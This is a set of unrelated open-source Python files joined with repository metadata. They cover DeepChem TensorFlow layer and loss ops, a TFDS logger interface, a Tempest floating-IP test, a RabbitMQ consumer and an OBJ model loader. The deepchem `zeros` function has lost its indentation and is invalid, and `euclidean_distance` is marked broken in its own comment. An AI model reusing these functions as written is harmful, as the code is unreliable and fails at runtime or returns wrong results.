  if x.dtype.base_dtype == tf.bool:
    x = tf.cast(x, tf.float32)
  return tf.reduce_mean(x, axis=reduce_axes, keep_dims=keepdims)
def dot(x, y):
  """Multiplies 2 tensors (and/or variables) and returns a *tensor*.

  When attempting to multiply a ND tensor
  with a ND tensor, it reproduces the Theano behavior.
  (e.g. (2, 3).(4, 3, 5) = (2, 4, 5))

  Parameters
  ----------
  x: Tensor or variable.
  y: Tensor or variable.

  Returns
  -------
  A tensor, dot product of x and y.
  """
  if get_ndim(x) is not None and (get_ndim(x) > 2 or get_ndim(y) > 2):
    # Build shapes that use static dimensions where known and fall back to
    # dynamic tf.shape() entries for unknown dimensions.
    x_shape = []
    for i, s in zip(int_shape(x), tf.unstack(tf.shape(x))):
      if i is not None:
        x_shape.append(i)
      else:
        x_shape.append(s)
    x_shape = tuple(x_shape)
    y_shape = []
    for i, s in zip(int_shape(y), tf.unstack(tf.shape(y))):
      if i is not None:
        y_shape.append(i)
      else:
        y_shape.append(s)
    y_shape = tuple(y_shape)
    # Move y's second-to-last axis (the contraction axis) to the front,
    # flatten both operands to 2-D, matmul, and restore the Theano-style
    # result shape x_shape[:-1] + y_shape[:-2] + y_shape[-1:].
    y_permute_dim = list(range(get_ndim(y)))
    y_permute_dim = [y_permute_dim.pop(-2)] + y_permute_dim
    xt = tf.reshape(x, [-1, x_shape[-1]])
    yt = tf.reshape(tf.transpose(y, perm=y_permute_dim), [y_shape[-2], -1])
    return tf.reshape(
        tf.matmul(xt, yt), x_shape[:-1] + y_shape[:-2] + y_shape[-1:])
  # Plain (<= 2-D) case: defer to matmul directly.
  out = tf.matmul(x, y)
  return out
def get_ndim(x):
  """Returns the number of axes in a tensor, as an integer.

  Parameters
  ----------
  x: Tensor or variable.

  Returns
  -------
  Integer (scalar), number of axes, or None when the rank is unknown.
  """
  dims = x.get_shape()._dims
  return None if dims is None else len(dims)
def get_dtype(x):
  """Returns the dtype of a Keras tensor or variable, as a string.

  Parameters
  ----------
  x: Tensor or variable.

  Returns
  -------
  String, dtype of `x`.
  """
  dtype = x.dtype
  return dtype.name
def clip(x, min_value, max_value):
  """Element-wise value clipping to the interval [min_value, max_value].

  If max_value < min_value the interval collapses to
  [min_value, min_value].

  Returns
  -------
  A tensor.
  """
  if max_value is not None and max_value < min_value:
    max_value = min_value
  base_dtype = x.dtype.base_dtype
  lower = _to_tensor(min_value, base_dtype)
  upper = _to_tensor(max_value, base_dtype)
  return tf.clip_by_value(x, lower, upper)
def epsilon():
  """Returns the value of the fuzz
  factor used in numeric expressions.

  Returns
  -------
  A float.
  """
  # Matches Keras' default fuzz factor.
  fuzz_factor = 1e-7
  return fuzz_factor
def random_uniform_variable(shape,
                            low,
                            high,
                            dtype=tf.float32,
                            name=None,
                            seed=None):
  """Instantiates an variable filled with
  samples drawn from a uniform distribution and returns it.

  Parameters
  ----------
  shape: Tuple of integers, shape of returned variable.
  low: Float, lower boundary of the output inteval.
  high: Float, upper boundary of the output interval.
  dtype: Tensorflow dtype
  name: String, name of returned variable.
  seed: Integer, random seed.

  Returns
  -------
  A tf.Variable, filled with drawn samples.
  """
  shape = tuple(map(int, shape))
  if seed is None:
    # ensure that randomness is conditioned by the Numpy RNG.
    # np.random.randint expects an int bound; the original passed the
    # float literal 10e8, which newer numpy versions reject.
    seed = np.random.randint(int(1e9))
  value = tf.random_uniform_initializer(
      low, high, dtype=dtype, seed=seed)(shape)
  return tf.Variable(value, dtype=dtype, name=name)
def random_normal_variable(shape,
                           mean,
                           scale,
                           dtype=tf.float32,
                           name=None,
                           seed=None):
  """Instantiates an Keras variable filled with
  samples drawn from a normal distribution and returns it.

  Parameters
  ----------
  shape: Tuple of integers, shape of returned Keras variable.
  mean: Float, mean of the normal distribution.
  scale: Float, standard deviation of the normal distribution.
  dtype: Tensorflow dtype
  name: String, name of returned Keras variable.
  seed: Integer, random seed.

  Returns
  -------
  A tf.Variable, filled with drawn samples.
  """
  shape = tuple(map(int, shape))
  if seed is None:
    # ensure that randomness is conditioned by the Numpy RNG.
    # np.random.randint expects an int bound; the original passed the
    # float literal 10e8, which newer numpy versions reject.
    seed = np.random.randint(int(1e9))
  value = tf.random_normal_initializer(
      mean, scale, dtype=dtype, seed=seed)(shape)
  return tf.Variable(value, dtype=dtype, name=name)
def max(x, axis=None, keepdims=False):
  """Maximum value in a tensor.

  Parameters
  ----------
  x: A tensor or variable.
  axis: An integer, the axis to find maximum values.
  keepdims: A boolean, whether to keep the dimensions or not.
    If `keepdims` is `False`, the rank of the tensor is reduced
    by 1. If `keepdims` is `True`,
    the reduced dimension is retained with length 1.

  Returns
  -------
  A tensor with maximum values of `x`.
  """
  reduce_axes = _normalize_axis(axis, get_ndim(x))
  return tf.reduce_max(x, axis=reduce_axes, keep_dims=keepdims)
def l2_normalize(x, axis):
  """Normalizes a tensor wrt the L2 norm alongside the specified axis.

  Parameters
  ----------
  x: input tensor.
  axis: axis along which to perform normalization; negative values are
    normalized against the rank of `x`.

  Returns
  -------
  A tensor.
  """
  if axis < 0:
    axis %= len(x.get_shape())
  return tf.nn.l2_normalize(x, dim=axis)
def categorical_crossentropy(output, target, from_logits=False):
  """Categorical crossentropy between an output tensor
  and a target tensor, where the target is a tensor of the same
  shape as the output.

  Parameters
  ----------
  output: probability tensor (or logits tensor if `from_logits=True`).
  target: tensor of the same shape as `output`.
  from_logits: bool, whether `output` is a logits tensor.

  Returns
  -------
  A tensor with the per-sample crossentropy.
  """
  # Note: tf.nn.softmax_cross_entropy_with_logits
  # expects logits, Keras expects probabilities.
  if not from_logits:
    # scale preds so that the class probas of each sample sum to 1
    output /= tf.reduce_sum(
        output, axis=len(output.get_shape()) - 1, keep_dims=True)
    # manual computation of crossentropy.
    # The original referenced a module global `_EPSILON` that is never
    # defined in this module (a NameError at runtime); use the epsilon()
    # helper instead.
    _epsilon = _to_tensor(epsilon(), output.dtype.base_dtype)
    output = tf.clip_by_value(output, _epsilon, 1. - _epsilon)
    return -tf.reduce_sum(
        target * tf.log(output), axis=len(output.get_shape()) - 1)
  else:
    # Keyword-name compatibility across TF versions.
    try:
      return tf.nn.softmax_cross_entropy_with_logits(
          labels=target, logits=output)
    except TypeError:
      return tf.nn.softmax_cross_entropy_with_logits(
          logits=output, labels=target)
def sparse_categorical_crossentropy(output, target, from_logits=False):
  """Categorical crossentropy between an output tensor
  and a target tensor, where the target is an integer tensor.

  Parameters
  ----------
  output: probability tensor (or logits tensor if `from_logits=True`).
  target: integer tensor of class indices.
  from_logits: bool, whether `output` is a logits tensor.

  Returns
  -------
  A tensor with the per-sample crossentropy.
  """
  # Note: tf.nn.softmax_cross_entropy_with_logits
  # expects logits, Keras expects probabilities.
  if not from_logits:
    # The original referenced `_EPSILON`, `cast` and `flatten`, none of
    # which are defined in this module; use the epsilon() helper and
    # plain tf ops instead.
    _epsilon = _to_tensor(epsilon(), output.dtype.base_dtype)
    output = tf.clip_by_value(output, _epsilon, 1 - _epsilon)
    output = tf.log(output)
  output_shape = output.get_shape()
  # Flatten targets and collapse output to (batch, num_classes).
  targets = tf.cast(tf.reshape(target, [-1]), 'int64')
  logits = tf.reshape(output, [-1, int(output_shape[-1])])
  # Keyword-name compatibility across TF versions.
  try:
    res = tf.nn.sparse_softmax_cross_entropy_with_logits(
        labels=targets, logits=logits)
  except TypeError:
    res = tf.nn.sparse_softmax_cross_entropy_with_logits(
        logits=logits, labels=targets)
  if len(output_shape) == 3:
    # if our output includes timesteps we need to reshape
    return tf.reshape(res, tf.shape(output)[:-1])
  else:
    return res
def binary_crossentropy(output, target, from_logits=False):
  """Binary crossentropy between an output tensor and a target tensor.

  # Arguments
      output: A tensor.
      target: A tensor with the same shape as `output`.
      from_logits: Whether `output` is expected to be a logits tensor.
          By default, we consider that `output`
          encodes a probability distribution.

  # Returns
      A tensor.
  """
  # Note: tf.nn.sigmoid_cross_entropy_with_logits
  # expects logits, Keras expects probabilities.
  if not from_logits:
    # transform back to logits.
    # The original referenced a module global `_EPSILON` that is never
    # defined in this module (a NameError at runtime); use the epsilon()
    # helper instead.
    _epsilon = _to_tensor(epsilon(), output.dtype.base_dtype)
    output = tf.clip_by_value(output, _epsilon, 1 - _epsilon)
    output = tf.log(output / (1 - output))
  # Keyword-name compatibility across TF versions.
  try:
    return tf.nn.sigmoid_cross_entropy_with_logits(labels=target, logits=output)
  except TypeError:
    return tf.nn.sigmoid_cross_entropy_with_logits(logits=output, labels=target)
def sum(x, axis=None, keepdims=False):
  """Sum of the values in a tensor, alongside the specified axis.

  Parameters
  ----------
  x: A tensor or variable.
  axis: An integer, the axis to sum over.
  keepdims: A boolean, whether to keep the dimensions or not.
    If keepdims is False, the rank of the tensor is reduced
    by 1. If keepdims is True,
    the reduced dimension is retained with length 1.

  Returns
  -------
  A tensor with sum of x.
  """
  reduce_axes = _normalize_axis(axis, get_ndim(x))
  return tf.reduce_sum(x, axis=reduce_axes, keep_dims=keepdims)
# TODO(rbharath): Need to rename this. This makes a variable, not just creates
# a tensor. Confusing with tf.zeros...
def zeros(shape, dtype=tf.float32, name=None):
"""Instantiates an all-zeros variable and returns it.
Parameters
----------
shape: Tuple of integers, shape of returned Keras variable
dtype: Tensorflow dtype
name: String, name of returned Keras variable
Returns
-------
A variable (including Keras metadata), filled with `0.0`.
"""
shape = tuple(map(int, shape))
return tf.Variable(
tf.constant_initializer(0., dtype=dtype)(shape), dtype, name)
def cosine_distances(test, support):
  """Computes pairwise cosine distances between provided tensors

  NOTE(review): despite the name, this returns the Gram matrix of the
  (approximately) L2-normalized rows — i.e. cosine *similarities*, not
  distances. Callers should confirm which convention they expect.

  Parameters
  ----------
  test: tf.Tensor
    Of shape (n_test, n_feat)
  support: tf.Tensor
    Of shape (n_support, n_feat)

  Returns
  -------
  tf.Tensor:
    Of shape (n_test, n_support)
  """
  # 1e-7 is added to the reciprocal norms (after rsqrt) to avoid division
  # blow-ups on zero rows; the normalization is therefore approximate.
  rnorm_test = tf.rsqrt(
      tf.reduce_sum(tf.square(test), 1, keep_dims=True)) + 1e-7
  rnorm_support = tf.rsqrt(
      tf.reduce_sum(tf.square(support), 1, keep_dims=True)) + 1e-7
  test_normalized = test * rnorm_test
  support_normalized = support * rnorm_support
  # Transpose for mul
  support_normalized_t = tf.transpose(support_normalized, perm=[1, 0])
  g = tf.matmul(test_normalized, support_normalized_t)  # Gram matrix
  return g
def elu(x, alpha=1.):
  """Exponential linear unit.

  Parameters
  ----------
  x: A tensor or variable to compute the activation function for.
  alpha: A scalar, slope of positive section.

  Returns
  -------
  A tensor.
  """
  activated = tf.nn.elu(x)
  # Only rescale the negative part (where x <= 0, elu(x) <= 0) when a
  # non-default alpha is requested.
  if alpha != 1:
    activated = tf.where(x > 0, activated, alpha * activated)
  return activated
def relu(x, alpha=0., max_value=None):
  """Rectified linear unit.

  With default values, it returns element-wise `max(x, 0)`.

  Parameters
  ----------
  x: A tensor or variable.
  alpha: A scalar, slope of negative section (default=`0.`).
  max_value: Saturation threshold.

  Returns
  -------
  A tensor.
  """
  if alpha != 0.:
    # Capture the negative part before x is rectified below.
    negative_part = tf.nn.relu(-x)
  x = tf.nn.relu(x)
  if max_value is not None:
    # Saturate the positive side at max_value.
    max_value = _to_tensor(max_value, x.dtype.base_dtype)
    zero = _to_tensor(0., x.dtype.base_dtype)
    x = tf.clip_by_value(x, zero, max_value)
  if alpha != 0.:
    # Re-introduce the (scaled) negative slope: alpha * x for x < 0.
    alpha = _to_tensor(alpha, x.dtype.base_dtype)
    x -= alpha * negative_part
  return x
def hard_sigmoid(x):
  """Segment-wise linear approximation of sigmoid.

  Faster than sigmoid.
  Returns 0. if x < -2.5, 1. if x > 2.5.
  In -2.5 <= x <= 2.5, returns 0.2 * x + 0.5.

  Parameters
  ----------
  x: A tensor or variable.

  Returns
  -------
  A tensor.
  """
  scaled = (0.2 * x) + 0.5
  lower = _to_tensor(0., scaled.dtype.base_dtype)
  upper = _to_tensor(1., scaled.dtype.base_dtype)
  return tf.clip_by_value(scaled, lower, upper)
def sqrt(x):
  """Element-wise square root.

  Negative inputs are clipped to zero before the root is taken.

  Parameters
  ----------
  x: input tensor.

  Returns
  -------
  A tensor.
  """
  base_dtype = x.dtype.base_dtype
  clipped = tf.clip_by_value(x,
                             _to_tensor(0., base_dtype),
                             _to_tensor(np.inf, base_dtype))
  return tf.sqrt(clipped)
def var(x, axis=None, keepdims=False):
  """Variance of a tensor, alongside the specified axis.

  Parameters
  ----------
  x: A tensor or variable.
  axis: An integer, the axis to compute the variance.
  keepdims: A boolean, whether to keep the dimensions or not.
    If keepdims is False, the rank of the tensor is reduced
    by 1. If keepdims is True,
    the reduced dimension is retained with length 1.

  Returns
  -------
  A tensor with the variance of elements of `x`.
  """
  axis = _normalize_axis(axis, get_ndim(x))
  if x.dtype.base_dtype == tf.bool:
    x = tf.cast(x, tf.float32)
  # E[(x - E[x])^2]; the inner mean keeps dims so it broadcasts against x.
  centered = x - tf.reduce_mean(x, axis=axis, keep_dims=True)
  return tf.reduce_mean(tf.square(centered), axis=axis, keep_dims=keepdims)
def euclidean_distance(test, support, max_dist_sq=20):
  """Computes pairwise euclidean distances between provided tensors

  TODO(rbharath): BROKEN! THIS DOESN'T WORK!

  Parameters
  ----------
  test: tf.Tensor
    Of shape (n_test, n_feat)
  support: tf.Tensor
    Of shape (n_support, n_feat)
  max_dist_sq: float, optional
    Maximum pairwise distance allowed.

  Returns
  -------
  tf.Tensor:
    Of shape (n_test, n_support)
  """
  test = tf.expand_dims(test, 1)
  support = tf.expand_dims(support, 0)
  # NOTE(review): tf.maximum clamps the squared distance to *at least*
  # max_dist_sq, so g == -max_dist_sq whenever the true squared distance
  # is below the threshold — presumably tf.minimum was intended, which
  # is consistent with the BROKEN warning above. Confirm before fixing.
  g = -tf.maximum(tf.reduce_sum(tf.square(test - support), 2), max_dist_sq)
  return g
def add_bias(tensor, init=None, name=None):
  """Add a bias term to a tensor.

  Parameters
  ----------
  tensor: tf.Tensor
    Variable tensor.
  init: float
    Bias initializer. Defaults to zero.
  name: str
    Name for this op. Defaults to tensor.op.name.

  Returns
  -------
  tf.Tensor
    A biased tensor with the same shape as the input tensor.
  """
  # Default: one zero-initialized bias per unit of the last dimension.
  if init is None:
    init = tf.zeros([tensor.get_shape()[-1].value])
  with tf.name_scope(name, tensor.op.name, [tensor]):
    b = tf.Variable(init, name='b')
    return tf.nn.bias_add(tensor, b)
def dropout(tensor, dropout_prob, training=True, training_only=True):
  """Random dropout.

  This implementation supports "always-on" dropout (training_only=False), which
  can be used to calculate model uncertainty. See Gal and Ghahramani,
  http://arxiv.org/abs/1506.02142.

  NOTE(user): To simplify the implementation, I have chosen not to reverse
  the scaling that occurs in tf.nn.dropout when using dropout during
  inference. This shouldn't be an issue since the activations will be scaled
  by the same constant in both training and inference. This means that there
  are no training-time differences between networks that use dropout during
  inference and those that do not.

  Parameters
  ----------
  tensor: tf.Tensor
    Input tensor.
  dropout_prob: float
    Float giving dropout probability for weights (NOT keep probability).
  training: bool
    Whether the graph is being built for training; dropout is applied
    when True, or regardless when training_only is False.
  training_only: bool
    Boolean. If True (standard dropout), apply dropout only
    during training. If False, apply dropout during inference as well.

  Returns
  -------
  tf.Tensor:
    A tensor with the same shape as the input tensor.
  """
  # A falsy dropout_prob (0 or None) disables dropout entirely.
  if not dropout_prob:
    return tensor  # do nothing
  keep_prob = 1.0 - dropout_prob
  if training or not training_only:
    tensor = tf.nn.dropout(tensor, keep_prob)
  return tensor
def fully_connected_layer(tensor,
                          size=None,
                          weight_init=None,
                          bias_init=None,
                          name=None):
  """Fully connected layer.

  Parameters
  ----------
  tensor: tf.Tensor
    Input tensor (batch_size x num_features).
  size: int
    Number of output nodes for this layer.
  weight_init: float
    Weight initializer. Defaults to truncated normal (stddev 0.01).
  bias_init: float
    Bias initializer. Defaults to zeros.
  name: str
    Name for this op. Defaults to 'fully_connected'.

  Returns
  -------
  tf.Tensor:
    A new tensor representing the output of the fully connected layer.

  NOTE(review): the original docstring claimed a ValueError is raised for
  non-2D input, but no such check exists; a wrong rank surfaces as a TF
  shape error instead. (Commented-out debug prints were also removed.)
  """
  if weight_init is None:
    num_features = tensor.get_shape()[-1].value
    weight_init = tf.truncated_normal([num_features, size], stddev=0.01)
  if bias_init is None:
    bias_init = tf.zeros([size])
  with tf.name_scope(name, 'fully_connected', [tensor]):
    w = tf.Variable(weight_init, name='w', dtype=tf.float32)
    b = tf.Variable(bias_init, name='b', dtype=tf.float32)
    return tf.nn.xw_plus_b(tensor, w, b)
def weight_decay(penalty_type, penalty):
  """Create a weight-decay (regularization) cost over trainable weights.
  Parameters
  ----------
  penalty_type: str
    Either 'l1' (sum of absolute values) or 'l2' (sum of tf.nn.l2_loss).
  penalty: float
    Scalar multiplier applied to the accumulated penalty.
  Returns
  -------
  tf.Tensor:
    A scalar tensor containing the weight decay cost.
  Raises
  ------
  NotImplementedError
    If an unsupported penalty type is requested.
  """
  variables = []
  # Exclude bias variables: biases are 1-D while weight matrices are 2-D.
  for v in tf.trainable_variables():
    if v.get_shape().ndims == 2:
      variables.append(v)
  with tf.name_scope('weight_decay'):
    if penalty_type == 'l1':
      cost = tf.add_n([tf.reduce_sum(tf.abs(v)) for v in variables])
    elif penalty_type == 'l2':
      cost = tf.add_n([tf.nn.l2_loss(v) for v in variables])
    else:
      raise NotImplementedError('Unsupported penalty_type %s' % penalty_type)
    cost *= penalty
  return cost
def multitask_logits(features,
                     num_tasks,
                     num_classes=2,
                     weight_init=None,
                     bias_init=None,
                     dropout_prob=None,
                     name=None):
  """Build one logits tensor per classification task.
  Args:
    features: A 2D tensor with dimensions batch_size x num_features.
    num_tasks: Number of classification tasks.
    num_classes: Number of classes for each task.
    weight_init: Weight initializer.
    bias_init: Bias initializer.
    dropout_prob: Float giving dropout probability for weights (NOT keep
      probability).
    name: Name for this op. Defaults to 'multitask_logits'.
  Returns:
    A list of logit tensors; one for each classification task.
  """
  task_outputs = []
  # Zero-pad task numbers so the generated scope names sort lexicographically.
  pad_width = len(str(num_tasks))
  with tf.name_scope('multitask_logits'):
    for task in range(num_tasks):
      default_scope = 'task' + str(task).zfill(pad_width)
      with tf.name_scope(name, default_scope, [features]):
        task_outputs.append(
            logits(features,
                   num_classes,
                   weight_init=weight_init,
                   bias_init=bias_init,
                   dropout_prob=dropout_prob))
  return task_outputs
def logits(features,
           num_classes=2,
           weight_init=None,
           bias_init=None,
           dropout_prob=None,
           name=None):
  """Create a logits tensor for a single classification task.
  You almost certainly don't want dropout on there -- it's like randomly setting
  the (unscaled) probability of a target class to 0.5.
  Args:
    features: A 2D tensor with dimensions batch_size x num_features.
    num_classes: Number of classes for each task.
    weight_init: Weight initializer.
    bias_init: Bias initializer.
    dropout_prob: Float giving dropout probability for weights (NOT keep
      probability).
    name: Name for this op.
  Returns:
    A logits tensor with shape batch_size x num_classes.
  """
  with tf.name_scope(name, 'logits', [features]) as name:
    # Project features down to num_classes, then (optionally) apply dropout.
    fc = fully_connected_layer(features,
                               num_classes,
                               weight_init=weight_init,
                               bias_init=bias_init,
                               name=name)
    return dropout(fc, dropout_prob)
def softmax_N(tensor, name=None):
  """Apply softmax across last dimension of a tensor.
  Args:
    tensor: Input tensor.
    name: Name for this op. If None, defaults to 'softmax_N'.
  Returns:
    A tensor with softmax-normalized values on the last dimension.
  """
  with tf.name_scope(name, 'softmax_N', [tensor]):
    reduction_indices = [tensor.get_shape().ndims - 1]
    # Subtract the per-row max before exponentiating: exp() of large logits
    # overflows to inf, while softmax itself is invariant to this shift, so
    # the result is mathematically unchanged but numerically stable.
    shifted = tensor - tf.reduce_max(
        tensor, axis=reduction_indices, keep_dims=True)
    exp_tensor = tf.exp(shifted)
    return tf.div(exp_tensor,
                  tf.reduce_sum(
                      exp_tensor, axis=reduction_indices, keep_dims=True))
def optimizer(optimizer="adam", learning_rate=.001, momentum=.9):
  """Create model optimizer.
  Parameters
  ----------
  optimizer: str, optional
    Name of optimizer
  learning_rate: float, optional
    Learning rate for algorithm
  momentum: float, optional
    Momentum rate
  Returns
  -------
  A training Optimizer.
  Raises:
    NotImplementedError: If an unsupported optimizer is requested.
  """
  # TODO(user): gradient clipping (see Minimize)
  # Dispatch table; each entry is lazy so only the requested optimizer is
  # actually constructed.
  builders = {
      'adagrad': lambda: tf.train.AdagradOptimizer(learning_rate),
      'adam': lambda: tf.train.AdamOptimizer(learning_rate),
      'momentum': lambda: tf.train.MomentumOptimizer(learning_rate, momentum),
      'rmsprop': lambda: tf.train.RMSPropOptimizer(learning_rate, momentum),
      'sgd': lambda: tf.train.GradientDescentOptimizer(learning_rate),
  }
  if optimizer not in builders:
    raise NotImplementedError('Unsupported optimizer %s' % optimizer)
  return builders[optimizer]()
|
joegomes/deepchem
|
deepchem/nn/model_ops.py
|
Python
|
mit
| 27,568
|
from target import *
<error descr="Unresolved reference 'xyzzy'">x<caret>yzzy</error>
shazam()
|
asedunov/intellij-community
|
python/testData/inspections/importFromModuleStar/source.py
|
Python
|
apache-2.0
| 96
|
# coding=utf-8
# Copyright 2022 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module defines the methods a logger implementation should define."""
from typing import Dict, Optional, Union
from tensorflow_datasets.core import splits as splits_lib
from tensorflow_datasets.core.utils import read_config as tfds_read_config
class Logger:
  """Defines interface any TFDS logger must implement.
  Registered loggers methods are called on TFDS events, synchronously, from the
  same thread the call was made, in sequence, and in registration order.
  Exceptions are *NOT* caught.
  """

  def as_dataset(
      self,
      *,
      dataset_name: str,
      config_name: Optional[str],
      version: str,
      data_path: str,
      split: Union[str, splits_lib.ReadInstruction],
      batch_size: Optional[int],
      shuffle_files: bool,
      read_config: tfds_read_config.ReadConfig,
      as_supervised: bool,
      decoders: Dict[str, str],
  ):
    """Callback called when user calls `dataset_builder.as_dataset`.
    Callback is also triggered by `tfds.load`, which calls `as_dataset`.
    The logger MUST NOT mutate passed objects (decoders, read_config, ...).
    Args:
      dataset_name: the name of the dataset. E.g.: "mnist".
      config_name: the name of the config or None.
      version: the dataset version. E.g.: "1.2.3".
      data_path: The path to directory of the dataset loaded. E.g.:
        "/home/alice/.tensorflow_datasets/mnist/1.2.3".
      split: name of the split requested by user. 'all' for all splits.
      batch_size: See DatasetBuilder.as_dataset docstring.
      shuffle_files: -
      read_config: -
      as_supervised: -
      decoders: flatten dict of decoders dict given to `as_dataset`, with the
        values being `{module_name}.{class_name}` strings instead of the
        decoder objects themselves (per the Dict[str, str] annotation).
    """
    # Interface stub: concrete loggers override this.
    raise NotImplementedError
|
tensorflow/datasets
|
tensorflow_datasets/core/logging/base_logger.py
|
Python
|
apache-2.0
| 2,385
|
# Copyright 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from tempest_lib.common.utils import data_utils
from tempest_lib import exceptions as lib_exc
from tempest.api.compute import base
from tempest import config
from tempest import test
CONF = config.CONF
class FloatingIPDetailsNegativeTestJSON(base.BaseV2ComputeTest):
    """Negative tests for floating IP detail retrieval."""

    @classmethod
    def setup_clients(cls):
        super(FloatingIPDetailsNegativeTestJSON, cls).setup_clients()
        cls.client = cls.floating_ips_client

    @test.attr(type=['negative'])
    @test.idempotent_id('7ab18834-4a4b-4f28-a2c5-440579866695')
    @test.services('network')
    def test_get_nonexistent_floating_ip_details(self):
        # GET on a floating IP id that cannot exist must raise NotFound.
        # Neutron identifies floating IPs by UUID; nova-network by integer
        # id, so build the bogus id to match whichever service is deployed.
        if CONF.service_available.neutron:
            bogus_id = str(uuid.uuid4())
        else:
            bogus_id = data_utils.rand_int_id(start=999)
        self.assertRaises(lib_exc.NotFound,
                          self.client.get_floating_ip_details, bogus_id)
|
danielmellado/tempest
|
tempest/api/compute/floating_ips/test_list_floating_ips_negative.py
|
Python
|
apache-2.0
| 1,698
|
#!/usr/bin/env python
# Minimal RabbitMQ "hello world" consumer (pika, Python 2 syntax).
import pika

# Connect to a broker running on localhost and open a channel.
connection = pika.BlockingConnection(pika.ConnectionParameters(
    host='localhost'))
channel = connection.channel()
# Declaring the queue is idempotent; it ensures 'hello' exists before we
# start consuming (the producer may not have run yet).
channel.queue_declare(queue='hello')
print ' [*] Waiting for messages. To exit press CTRL+C'
def callback(ch, method, properties, body):
    # Invoked once per delivered message; body is the raw message payload.
    print " [x] Received %r" % (body,)
# no_ack=True: the broker forgets messages as soon as they are delivered,
# so nothing is re-queued if this consumer dies mid-message.
channel.basic_consume(callback,
                      queue='hello',
                      no_ack=True)
# Blocks forever, dispatching each delivery to callback.
channel.start_consuming()
|
obulpathi/rabbitmq
|
receive.py
|
Python
|
gpl-2.0
| 469
|
from OpenGL.GL import *
from OpenGL.GLU import *
import pygame
import os.path
class Material(object):
    """A named surface material: a texture file name plus its GL texture id."""
    def __init__(self):
        self.name = ""
        # Texture image file name; set when parsing 'map_Kd' in the .mtl file.
        self.texture_fname = None
        # OpenGL texture object id; assigned once the texture is uploaded.
        self.texture_id = None
class FaceGroup(object):
    """A run of triangles that all share one material."""
    def __init__(self):
        # Each entry is a (vertex_index, tex_coord_index, normal_index) tuple.
        self.tri_indices = []
        self.material_name = ""
class Model3D(object):
    """A textured triangle mesh loaded from a Wavefront OBJ/MTL file pair.

    Geometry (vertices, texture coordinates, normals) is read by read_obj();
    materials and their textures come from the companion .mtl library.
    Rendering goes through draw(), or draw_quick() which caches a display list.
    """

    def __init__(self):
        self.vertices = []      # list of (x, y, z) tuples
        self.tex_coords = []    # list of (s, t) tuples
        self.normals = []       # list of (x, y, z) tuples
        self.materials = {}     # material name -> Material
        self.face_groups = []   # triangles grouped by material
        # OpenGL display list id; created lazily by draw_quick().
        self.display_list_id = None

    def __del__(self):
        # Called when the model is cleaned up by Python
        self.free_resources()

    def free_resources(self):
        """Release the display list, textures and geometry owned by this model."""
        # Delete the display list and textures
        if self.display_list_id is not None:
            glDeleteLists(self.display_list_id, 1)
            self.display_list_id = None
        # Delete any textures we used
        for material in self.materials.values():
            if material.texture_id is not None:
                glDeleteTextures(material.texture_id)
        # Clear all the materials
        self.materials.clear()
        # Clear the geometry lists
        del self.vertices[:]
        del self.tex_coords[:]
        del self.normals[:]
        del self.face_groups[:]

    def read_obj(self, fname):
        """Parse a Wavefront .obj file and upload any referenced textures.

        Only triangular faces are supported, and each face vertex must use
        the full v/vt/vn index form.
        """
        current_face_group = None
        # BUG FIX: the file handle used to be leaked; 'with' closes it.
        with open(fname) as file_in:
            for line in file_in:
                # Parse command and data from each line
                words = line.split()
                # BUG FIX: blank lines used to raise IndexError on words[0].
                if not words:
                    continue
                command = words[0]
                data = words[1:]
                if command == 'mtllib': # Material library
                    model_path = os.path.split(fname)[0]
                    mtllib_path = os.path.join( model_path, data[0] )
                    self.read_mtllib(mtllib_path)
                elif command == 'v': # Vertex
                    x, y, z = data
                    vertex = (float(x), float(y), float(z))
                    self.vertices.append(vertex)
                elif command == 'vt': # Texture coordinate
                    s, t = data
                    tex_coord = (float(s), float(t))
                    self.tex_coords.append(tex_coord)
                elif command == 'vn': # Normal
                    x, y, z = data
                    normal = (float(x), float(y), float(z))
                    self.normals.append(normal)
                elif command == 'usemtl' : # Use material
                    current_face_group = FaceGroup()
                    current_face_group.material_name = data[0]
                    self.face_groups.append( current_face_group )
                elif command == 'f':
                    assert len(data) == 3, "Sorry, only triangles are supported"
                    # Parse indices from triples
                    for word in data:
                        vi, ti, ni = word.split('/')
                        # OBJ indices are 1-based; convert to 0-based.
                        indices = (int(vi) - 1, int(ti) - 1, int(ni) - 1)
                        current_face_group.tri_indices.append(indices)
        # Upload a GL texture for every material declared in the .mtl file.
        for material in self.materials.values():
            model_path = os.path.split(fname)[0]
            texture_path = os.path.join(model_path, material.texture_fname)
            texture_surface = pygame.image.load(texture_path)
            texture_data = pygame.image.tostring(texture_surface, 'RGB', True)
            material.texture_id = glGenTextures(1)
            glBindTexture(GL_TEXTURE_2D, material.texture_id)
            glTexParameteri( GL_TEXTURE_2D,
                             GL_TEXTURE_MAG_FILTER,
                             GL_LINEAR)
            glTexParameteri( GL_TEXTURE_2D,
                             GL_TEXTURE_MIN_FILTER,
                             GL_LINEAR_MIPMAP_LINEAR)
            glPixelStorei(GL_UNPACK_ALIGNMENT,1)
            width, height = texture_surface.get_rect().size
            gluBuild2DMipmaps( GL_TEXTURE_2D,
                               3,
                               width,
                               height,
                               GL_RGB,
                               GL_UNSIGNED_BYTE,
                               texture_data)

    def read_mtllib(self, mtl_fname):
        """Parse a .mtl material library, recording texture file names."""
        # BUG FIX: handle leak and blank-line crash, as in read_obj.
        with open(mtl_fname) as file_mtllib:
            for line in file_mtllib:
                words = line.split()
                if not words:
                    continue
                command = words[0]
                data = words[1:]
                if command == 'newmtl':
                    material = Material()
                    material.name = data[0]
                    self.materials[data[0]] = material
                elif command == 'map_Kd':
                    # NOTE(review): assumes 'map_Kd' always follows a 'newmtl'
                    # line -- otherwise `material` is unbound; confirm inputs.
                    material.texture_fname = data[0]

    def draw(self):
